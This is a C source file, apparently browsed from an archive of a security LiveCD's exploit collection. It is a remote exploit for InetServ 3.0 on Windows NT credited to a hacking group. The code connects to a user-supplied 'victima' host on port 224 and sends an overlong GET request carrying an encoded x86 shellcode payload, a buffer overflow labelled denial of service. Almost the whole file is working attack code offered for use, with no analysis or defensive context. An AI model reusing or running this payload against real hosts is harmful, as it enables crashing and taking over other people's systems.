home *** CD-ROM | disk | FTP | other *** search
/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / livecd.squashfs / opt / pentoo / ExploitTree / system / microsoft / remote / inetserv-exp.c < prev    next >
C/C++ Source or Header  |  2005-02-12  |  5KB  |  127 lines
  1. /**********************************************************************
  2.     InetServ 3.0 (Windows NT) REMOTE EXPLOIT CODEd by dr_fdisk^
  3. ***********************************************************************
  4. CLASE: DENIAL OF SERVICE
  5. BUG/SHELLCODE FOUND by: Greg  Hoglund 
  6.  
  7.        ))))))))))))((((((((((((
  8.        )))RaZa MeXiCaNa TeAm(((
  9.        ))))))))))))((((((((((((
  10.  
  11. w w w . r a z a - m e x i c a n a . o r g
  12. ((((((((((((((((((((((((((((((((((((((((((
  13.  
  14. ************************************************************************
  15. Aclaracion: el exploit lo programe porque lo necesitaba usar bajo Unix y
  16. no en entorno Windows como fue presentado.
  17. ************************************************************************/
  18.  
  19. /***********************************************************************
  20.  
  21. -----BEGIN PGP MESSAGE-----
  22. Version: 2.6.3i
  23.  
  24. owGtkMFKw0AQhtXjPsX3AimIN9HDkm5pIIkSg8QeKmt3lUWThbVilb6S7+iYkz0J
  25. km/4D//MwAz/18nFw/HpkcAvMuHyT362FIc0aFYiqDB0FOTi6rFDKy1Npf55StW2
  26. 9+e4dP/owuvzGqWyKVF5jMmFwbqYcP6F6xQ//GYbKcPwtsN32+R7rxq7slS+C7mt
  27. La3XPbyPNSNh+RRl9Hh2BDbiBtGMKNOnCV4+zHx+dluUXC1ol4batOzl+H50i6LW
  28. JXN9R3HD0jRm2rwk/28=
  29. =92LB
  30. -----END PGP MESSAGE-----
  31.  
  32. ************************************************************************/
  33.  
  34. /*------------------------------*
  35.  * DEFINIR EL PUERTO DEFAULT    */
  36. /*------------------------------*/
  37. #define PUERTO 224
  38.  
  39. #include <stdio.h>
  40. #include <sys/socket.h>
  41. #include <netinet/in.h>
  42. #include <netdb.h>
  43.  
  44. /*------------------------------*
  45.  *       COLORES DEFINIDOS[2000]*/
  46. /*------------------------------*/
  47.  
  48. #define NORMAL  "\E[m"
  49. #define VERDE   "\E[32m"
  50. #define BRILLOSO   "\E[1m"
  51. #define ROJO  "\E[31m"
  52. #define CELESTE "\E[36m"
  53. #define AZUL "\E[34m"
  54.  
  55. char shellcode[] =
  56.   "GET /AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" \
  57.   "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" \
  58.   "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" \
  59.   "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" \
  60.   "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" \
  61.   "AAAAAAAAAAABBBBAAAACCCCAAAAAAAAAAAAAAAAAAAAAAAAAAA" \
  62.   "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" \
  63.   "AAAAAAAAAAAAAAAAAAAAAAAAAAADDDDAAAAEEEEAAAAAAAAAAA" \
  64.   "\xB8\xFF\x1F\xED\x12\x2C\xFF\xC1\xC0\x18\x8B\xD8" \
  65.   "\x33\xC9\xB1\x46\x48\x80\x30\x80\x49\x75\xF9" \
  66.   "\x53\xB8\x48\x77\x78\x77\xBA\x77\x77\x77\x77" \
  67.   "\x33\xC2\x50\x33\xC0\x50\xB8\xAE\x9B\x65\x77\x33\xC2\x50"
  68.   "\xB8\x75\x77\x77\xF7\x33\xC2\x50\xB8\x7B\xA7\x34\x77" \
  69.   "\x33\xC2\xFF\x10\x8B\xFB\xBA\x77\x77\x77\x77" \
  70.   "\xB8\x63\x9A\x65\x77\x33\xC2\x2B\xD8\x53\x50" \
  71.   "\x6A\x01\x33\xC9\x51\xB8\x70\x9A\x65\x77" \
  72.   "\x33\xC2\x50\xFF\x37\xB8\x77\xA7\x34" \
  73.   "\x77\x33\xC2\xFF\x10\xCC"\
  74.   "AAAAAAAAAAAAAAA" \
  75.   "\x90\x90\xEB\x80\xEB\xD9\xF9\x77" \
  76.   "\xDC\xD3\xCF\xC6\xD4\xD7\xC1\xD2\xC5\xDC\xCD\xE9\xE3\xF2" \
  77.   "\xEF\xF3\xEF\xE6\xF4\xDC\xD7\xE9\xEE\xE4\xEF\xF7\xF3\xDC\xC3" \
  78.   "\xF5\xF2\xF2\xE5\xEE\xF4\xD6\xE5\xF2\xF3\xE9\xEF\xEE\xDC" \
  79.   "\xD2\xF5\xEE\x80" \
  80.   "\xDF\xD5\xD2\xDF\xC8\xC1\xD8\xCF\xD2\xC5\xC4\xDF\x80" \
  81.   "\xE3\xED\xE4\xAE\xE5\xF8\xE5\xA0\xAF\xE3\x80\x80\x80\x80\x80";
  82.  
  83. void victima(char *conn22);
  84. int conexion;
  85. void victima(char *conn22)
  86. {
  87.   struct sockaddr_in sin;
  88.   struct hostent *hp;
  89.   hp = gethostbyname(conn22);
  90.   if (hp==NULL)
  91.     {
  92.       printf("%s%sEl host %s no existe!!!!\n",ROJO,BRILLOSO,conn22);
  93.       exit(0);
  94.     }
  95.   bzero((char*) &sin, sizeof(sin));
  96.   bcopy(hp->h_addr, (char *) &sin.sin_addr, hp->h_length);
  97.   sin.sin_family = hp->h_addrtype;
  98.   sin.sin_port = htons(PUERTO);
  99.   conexion = socket(AF_INET, SOCK_STREAM, 0);
  100.   connect(conexion,(struct sockaddr *) &sin, sizeof(sin));
  101. }
  102.  
  103. void main(int argc, char **argv)
  104. {
  105.   char buffer[1500];
  106.   int a;
  107.   char salida[50];
  108.   if (argc != 2)
  109.     {
  110.       system("clear");
  111.       printf("\n\n\n\n");
  112.       printf("%s%s InetServ 3.0 (Windows NT) REMOTE EXPLOIT CODEd by dr_fdisk^\n",VERDE,BRILLOSO);
  113.       printf("%s----------------------------------------------------------------------\n\n",CELESTE);
  114.       printf ("%s RaZa MeXiCaNa TeAm %swww.raza-mexicana.org\n\n",ROJO,CELESTE);
  115.       printf ("-------===============================-------\n\n\n");
  116.       printf("Uso: %s%s <hostname>\n\n",AZUL,argv[0]);
  117.       exit(0);
  118.     }
  119.   printf("%s%sVictima: %s \n"NORMAL,ROJO,BRILLOSO,argv[1]);
  120.   printf("%s----------------------------------------------------"NORMAL,AZUL);
  121.   victima(argv[1]);
  122.   sprintf(buffer,"%s",shellcode);
  123.   send(conexion, buffer, strlen(buffer), 0);
  124.   printf("%s%s%sTHE END\n\n",NORMAL,VERDE,BRILLOSO);
  125. }
  126. /*********************************THE END************************************/
  127. /*                    www.hack.co.za                  [25 Feb 2000]*/